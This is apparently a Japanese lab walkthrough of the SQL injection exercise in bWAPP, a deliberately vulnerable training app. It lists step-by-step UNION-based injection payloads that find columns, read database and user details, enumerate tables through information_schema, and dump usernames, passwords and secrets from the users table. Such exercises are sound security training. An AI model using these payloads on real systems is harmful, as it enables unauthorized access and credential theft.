Hello there,
A1 ⇨ SQL Injection(AJAX/JSON/jQuery)を選択して。
まずは、『Iron』と入力して検索してみることに。
下記のSQLインジェクションが可能か確認してみて。
' or 1=1 #
次に7つのカラムをチェックすると。
カラム番号は、2,3,4,5が確認され。
※UNION句はカラムの個数と型が同じでないとエラーとなって。
なので、1からはじめてエラーが出なくなるまで続けて。
0' union select all 1,2,3,4,5,6,7#
NULLは、型は関係ないので。
下記のような探し方もできて。
0' union select all 1,null,null,null,null,6,7#
確認できたカラムにインジェクションを。
system_user()で、Mysqlだということがわかって。
0' union select all 1,database(),user(),system_user(),@@version,6,7#
さらに、データベースのテーブルを確認することに。
0' union select all 1,table_name,3,4,5,6,7 from information_schema.tables #
次に『users』テーブルのカラムを確認することに。
0' union select all 1,column_name,3,4,5,6,7 from information_schema.columns where table_name = 'users' and table_schema="bWAPP" #
最後にテーブルの中身を確認して。
0' union select all 1, concat(id,login),password,email,secret,6,7 from users #
Best regards,